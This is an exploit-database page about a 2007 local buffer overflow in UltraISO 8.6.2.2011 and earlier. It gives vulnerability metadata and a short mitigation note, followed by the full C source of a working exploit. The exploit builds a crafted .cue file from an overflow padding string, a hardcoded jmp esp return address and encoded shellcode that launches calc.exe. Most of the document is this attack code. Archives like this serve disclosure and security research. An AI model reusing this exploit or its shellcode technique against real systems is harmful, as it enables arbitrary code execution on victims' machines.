header-logo
Suggest Exploit
vendor:
UltraISO
by:
n00b
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: UltraISO
Affected Version From: <= 8.6.2.2011
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:ezb_systems:ultraiso:8.6.2.2011
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Service Pack 2
2007

UltraISO <= 8.6.2.2011 local buffer-overflow

This exploit allows an attacker to execute arbitrary code on a vulnerable machine running UltraISO version 8.6.2.2011 or earlier. The exploit takes advantage of a local buffer overflow vulnerability in the software. By providing a specially crafted bin and cue file, an attacker can execute arbitrary code with the privileges of the user running the vulnerable software. This exploit has been tested on Windows XP Service Pack 2. The shell_code used in the exploit is designed to execute the Windows calculator (calc.exe).

Mitigation:

Upgrade to a version of UltraISO that is not vulnerable to this buffer overflow
Source

Exploit-DB raw data:

/*
Date : May 28th 2007.
UltraISO <= 8.6.2.2011 local buffer-over flow by n00b
You might need to change the jmp esp% adress to your version.
Tested on win xp service pack 2 <eng> executes calc.Don't
forget you need to have the bin and cue file in the same 
Directory special thanks to Thomas Pollet also.

*/

#include <stdlib.h>
#include <stdio.h>

//Calc shell_code
unsigned char shell_code[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" 
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" 
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38" 
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" 
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38" 
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a" 
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" 
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a" ;

int main(int argc, char *argv[])
{
	FILE *cue;

	FILE *bin;

 if(argc < 2) {
 
 system("cls");
 printf("\n *************************************************");
 printf("\n *************************************************");
 printf("\n *   Ultra Iso local buffer over flow by n00b    *");
 printf("\n *************************************************");
 printf("\n *          Special thanks to Str0ke             *");
 printf("\n *************************************************");
 printf("\n * Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo*");
 printf("\n * Date :          May 28th 2007                 *");
 printf("\n *************************************************");
 printf("\n * Credit's to n00b for finding this bug and poc *");
 printf("\n *************************************************");
 printf("\n    Usage:>  Exploit.cue   Exploit.bin            ");
 printf("\n *************************************************");

		return 0;
	}
      if(!(cue = fopen(argv[1], "w"))) {
		printf("[+] Error");
		return 0;
	}
  
	fputs("FILE \"", cue);
	for (int i=0;i<1099;i++) \
	fputs("A", cue);
	fputs("\x43\x41\xf8\x77", cue); 
       
    fputs((char *)shell_code, cue);
    fputs(".bin \"", cue);
	fputs("\" BINARY\n", cue);
	fputs(" TRACK 01 MODE2/2352\n", cue);
	fputs(" INDEX 01 00:00:00\n", cue);
	
    fclose(cue);
    
      if(!(bin = fopen(argv[2], "w"))) {
		printf("[+] Error");
		return 0;
	}

	fputs("Fake bin file\n", bin);
	fclose(bin);
	printf("File's successfully created");
	return 0;
}

// milw0rm.com [2007-05-28]

Navigation

Suggest Exploit

Services By CQR